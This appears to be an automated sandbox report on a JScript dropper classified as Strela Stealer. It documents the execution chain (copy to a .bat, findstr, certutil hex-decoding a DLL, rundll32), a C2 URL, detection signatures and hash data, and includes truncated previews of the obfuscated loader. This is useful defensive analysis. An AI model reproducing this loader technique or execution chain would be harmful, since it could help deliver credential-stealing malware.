Edit tour

Windows Analysis Report
DOC117482996.js

Overview

General Information

Sample Name:	DOC117482996.js
Analysis ID:	1272186
MD5:	25c2826d695b5856d3faebaec17fbb12
SHA1:	aeeec46028687d1f2718dc2c679302424d9e558c
SHA256:	6ef79b0d87df8031acaa5f7302001fca22f908619f1c887ce70539050c3235ce
Tags:	js
Infos:

Detection

Strela Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Yara detected Strela Stealer

Sigma detected: Decode DLL Via Certutil

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

C2 URLs / IPs found in malware configuration

Queries the volume information (name, serial number etc) of a device

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7020 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC117482996.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 7112 cmdline: C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

findstr.exe (PID: 5788 cmdline: findstr /V OJGKAOK ""C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat"" MD5: BCC8F29B929DABF5489C9BE6587FF66D)

certutil.exe (PID: 6768 cmdline: certutil -f -decodehex MAVOOTC RCOJOMG.dll MD5: EB199893441CED4BBBCB547FE411CF2D)

rundll32.exe (PID: 6748 cmdline: rundll32 RCOJOMG.dll,h MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Strela Stealer

{
  "C2 url": "91.215.85.209/server.php"
}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.399709693.000000006D82B000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
00000005.00000002.399970462.000002230AB01000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: rundll32.exe PID: 6748	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.6d82b404.1.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
5.2.rundll32.exe.6d82b404.1.raw.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
5.2.rundll32.exe.6d7c0000.0.unpack	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Decode DLL Via Certutil

Source: Process started

Author: Joe Security: Data: Command: certutil -f -decodehex MAVOOTC RCOJOMG.dll , CommandLine: certutil -f -decodehex MAVOOTC RCOJOMG.dll , CommandLine|base64offset|contains: q, Image: C:\Windows\System32\certutil.exe, NewProcessName: C:\Windows\System32\certutil.exe, OriginalFileName: C:\Windows\System32\certutil.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: certutil -f -decodehex MAVOOTC RCOJOMG.dll , ProcessId: 6768, ProcessName: certutil.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.rundll32.exe.6d82b404.1.raw.unpack

Malware Configuration Extractor: Strela Stealer {"C2 url": "91.215.85.209/server.php"}

Antivirus detection for URL or domain

Source: 91.215.85.209/server.php

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: 91.215.85.209/server.php

Virustotal: Detection: 18%

Perma Link

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 91.215.85.209/server.php

Source: DOC117482996.js

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C197E
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C2253
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C3728
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C45DA
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C49B9
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C3099
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB01B10
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB0E9E8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB01240
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB067BC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB01740

Source: RCOJOMG.dll.4.dr

Static PE information: Number of sections : 17 > 10

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 RCOJOMG.dll,h

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC117482996.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V OJGKAOK ""C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decodehex MAVOOTC RCOJOMG.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 RCOJOMG.dll,h
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V OJGKAOK ""C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decodehex MAVOOTC RCOJOMG.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 RCOJOMG.dll,h

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat

Source: classification engine

Classification label: mal92.troj.evad.winJS@10/4@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: DOC117482996.js

Static file information: File size 1765670 > 1048576

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cMd /k copy "C:\Users\user\Desktop\DOC117482996.js" "%temp%\UHTGEZZ.bat"", "0", "true")

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C3775 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C2C72 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C1E45 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C2724 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C141F pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C4A05 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C46E4 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C30E5 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C2EE0 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C24DF pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C16D0 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C34CD pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C28A9 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_6D7C4090 pushfq ; ret
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000002230AB1654E push ecx; retf 003Fh

Source: RCOJOMG.dll.4.dr	Static PE information: section name: .xdata
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /4
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /19
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /31
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /45
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /57
Source: RCOJOMG.dll.4.dr	Static PE information: section name: /70

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\AppData\Local\Temp\RCOJOMG.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000002230AB01DD0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V OJGKAOK ""C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decodehex MAVOOTC RCOJOMG.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 RCOJOMG.dll,h

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_6D8294D0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Stealing of Sensitive Information

Yara detected Strela Stealer

Source: Yara match	File source: 5.2.rundll32.exe.6d82b404.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d82b404.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.399709693.000000006D82B000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.399970462.000002230AB01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6748, type: MEMORYSTR

Remote Access Functionality

Yara detected Strela Stealer

Source: Yara match	File source: 5.2.rundll32.exe.6d82b404.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d82b404.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.399709693.000000006D82B000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.399970462.000002230AB01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6748, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Scripting	Path Interception	11 Process Injection	1 Rundll32	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	121 Scripting	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DOC117482996.js	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
91.215.85.209/server.php	100%	Avira URL Cloud	malware
91.215.85.209/server.php	19%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
91.215.85.209/server.php	true	19%, Virustotal, Browse Avira URL Cloud: malware	low

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1272186
Start date and time:	2023-07-13 07:57:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	DOC117482996.js
Detection:	MAL
Classification:	mal92.troj.evad.winJS@10/4@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 10.1% (good quality ratio 9.5%) Quality average: 60.4% Quality standard deviation: 33.5%
HCA Information:	Successful, ratio: 75% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	1762499
Entropy (8bit):	3.3606309435141175
Encrypted:	false
SSDEEP:	12288:d9cKrrX0UIbyMJRj4pft6g0tmjivaZAgoaT6QRxIa99ReymNmt50K/A/he3/pCYM:d9XX9UZ78P0Y50K/Tw
MD5:	A6329B9910C25E35249C8126F877DC35
SHA1:	D236F436CF9FBB087146006E9AD6E2178C4498A0
SHA-256:	3FF9123B260EA4324F9A09A049133BAF7D6F47B0D33A4E1D28A987371C4C8A8B
SHA-512:	2CEBAA9E7F0C3F0D1974FADF0547710C93BBE018A7FDE6F45369C9F87269F6046C8949DFC360EFD0FFA197FDCECBF373E80C3390BAC8A9B3B744416C5EF80F06
Malicious:	false
Reputation:	low
Preview:	4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 11 00 9d ad ae 64 00 a4 08 00 90 03 00 00 f0 00 26 20 0b 02 02 1e 00 9c 06 00 00 72 08 00 00 0a 00 00 30 13 00 00 00 10 00 00 00 00 7c 6d 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 09 00 00 06 00 00 57 d7 09 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 b0 08 00 3c 00 00 00 00 c0 08 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 80 08 00 34 02 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

C:\Users\user\AppData\Local\Temp\RCOJOMG.dll

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	587499
Entropy (8bit):	6.643491802328249
Encrypted:	false
SSDEEP:	6144:9nKczq9WO0eTyLm/kp6KzeAb1gyXj0ZrMUo7TKzy:9n+Fa85ajCrOPKO
MD5:	35CC317D77B602E13A4979406F829D24
SHA1:	218CDA509DD5FB30FA5BD08F23CFBB2C851C0DA9
SHA-256:	957EEA25423A4F43E85EA4FDC6695048DBAE579FDF277C530F98C199C71902B4
SHA-512:	B84A98CC8998AA8209C1B5D9756B0458EDA91DF91C70A884B7B06E3EDAA6451E21D5CFB38D03939AE60B6CE0B5AD7FA4B0D12D86C49F8D69721C9AC094439B01
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..........& .........r......0.........\|m.............................p......W......... .........................................<.......................4...............d...........................@p..(...................l...0............................text...............................`.P`.data...............................@.P..rdata.......p.......`..............@.`@.pdata..4............d..............@.0@.xdata...............h..............@.0@.bss....0.............................`..edata..<............j..............@.0@.idata...............l..............@.0..CRT....X............r..............@.@..tls.................t..............@.@..reloc..d............v..............@.0B/4......P............x..............@.PB/19.............. ...z..............@..B/31.....I....0......................@..B/45....."....@......................@..B/57.....

C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (64801), with CRLF line terminators
Category:	dropped
Size (bytes):	1765670
Entropy (8bit):	3.3776219279560267
Encrypted:	false
SSDEEP:	12288:m9cKrrX0UIbyMJRj4pft6g0tmjivaZAgoaT6QRxIa99ReymNmt50K/A/he3/pCYY:m9XX9UZ78P0Y50K/T0
MD5:	25C2826D695B5856D3FAEBAEC17FBB12
SHA1:	AEEEC46028687D1F2718DC2C679302424D9E558C
SHA-256:	6EF79B0D87DF8031ACAA5F7302001FCA22F908619F1C887CE70539050C3235CE
SHA-512:	9A63C5179DFB23A69769A3C221FDC1FCCF2F7671CD3C67A42CE4A2ADCC1D1238CF682F04CD4A1EB44F680A49236CF2C3EE134298E2A49A53D805E765ACC128D3
Malicious:	true
Preview:	/* OJGKAOK..set OJGKAOKPPMSURA=e..set OJGKAOKKVKYJ=f..set OJGKAOKOVMSDGU=n..set OJGKAOKAGWIEVF=v..set OJGKAOKPNEMKCZ=x..set OJGKAOKJXHTS=g..set OJGKAOKXBSVW=c..set OJGKAOKOISVQE=r..set OJGKAOKAIMYH=k..set OJGKAOKYNRXWX=l..set OJGKAOKLIRHF=a..set OJGKAOKZMCBFG=p..set OJGKAOKMBBDU=j..set OJGKAOKCSFEM=y..set OJGKAOKXBYPVZS=o..set OJGKAOKQKRAMX=q..set OJGKAOKGOFVST=m..set OJGKAOKCQORVW=d..set OJGKAOKMRKFS=t..set OJGKAOKKGPBT=b..set OJGKAOKABWSAN=h..set OJGKAOKHIIVZZ=i..set OJGKAOKYVORN=w..set OJGKAOKCEETXP=z..set OJGKAOKYWSFA=s..set OJGKAOKOOLKUJ=u..%OJGKAOKXBSVW%%OJGKAOKCQORVW% %temp% &echo OJGKAOK..%OJGKAOKKVKYJ%%OJGKAOKHIIVZZ%%OJGKAOKOVMSDGU%%OJGKAOKCQORVW%%OJGKAOKYWSFA%%OJGKAOKMRKFS%%OJGKAOKOISVQE% /V OJGKAOK "%0" > MAVOOTC..4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 6

C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	ASCII text, with very long lines (64801), with CRLF line terminators
Entropy (8bit):	3.3776219279560267
TrID:
File name:	DOC117482996.js
File size:	1'765'670 bytes
MD5:	25c2826d695b5856d3faebaec17fbb12
SHA1:	aeeec46028687d1f2718dc2c679302424d9e558c
SHA256:	6ef79b0d87df8031acaa5f7302001fca22f908619f1c887ce70539050c3235ce
SHA512:	9a63c5179dfb23a69769a3c221fdc1fccf2f7671cd3c67a42ce4a2adcc1d1238cf682f04cd4a1eb44f680a49236cf2c3ee134298e2a49a53d805e765acc128d3
SSDEEP:	12288:m9cKrrX0UIbyMJRj4pft6g0tmjivaZAgoaT6QRxIa99ReymNmt50K/A/he3/pCYY:m9XX9UZ78P0Y50K/T0
TLSH:	1C85CC0E55AC130EC7222AEE6B6D34D38374DB17B5F5C9D2899DBAA29C5DC368B31034
File Content Preview:	/* OJGKAOK..set OJGKAOKPPMSURA=e..set OJGKAOKKVKYJ=f..set OJGKAOKOVMSDGU=n..set OJGKAOKAGWIEVF=v..set OJGKAOKPNEMKCZ=x..set OJGKAOKJXHTS=g..set OJGKAOKXBSVW=c..set OJGKAOKOISVQE=r..set OJGKAOKAIMYH=k..set OJGKAOKYNRXWX=l..set OJGKAOKLIRHF=a..set OJGKAOKZM

File Icon


Icon Hash:	68d69b8bb6aa9a86

• wscript.exe
• cmd.exe
• conhost.exe
• findstr.exe
• certutil.exe
• rundll32.exe

Click to jump to process

Target ID:	0
Start time:	07:58:55
Start date:	13/07/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC117482996.js"
Imagebase:	0x7ff61ac60000
File size:	163'840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	07:58:57
Start date:	13/07/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\DOC117482996.js" "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat" && "C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat
Imagebase:	0x7ff627730000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	07:58:57
Start date:	13/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: findstr.exePID: 5788, Parent PID: 7112

General

Target ID:	3
Start time:	07:58:58
Start date:	13/07/2023
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V OJGKAOK ""C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat""
Imagebase:	0x7ff7b47a0000
File size:	34'304 bytes
MD5 hash:	BCC8F29B929DABF5489C9BE6587FF66D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	4
Start time:	07:58:59
Start date:	13/07/2023
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decodehex MAVOOTC RCOJOMG.dll
Imagebase:	0x7ff791620000
File size:	1'557'504 bytes
MD5 hash:	EB199893441CED4BBBCB547FE411CF2D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	5
Start time:	07:59:00
Start date:	13/07/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 RCOJOMG.dll,h
Imagebase:	0x7ff7a0860000
File size:	69'632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000005.00000002.399709693.000000006D82B000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000005.00000002.399970462.000002230AB01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
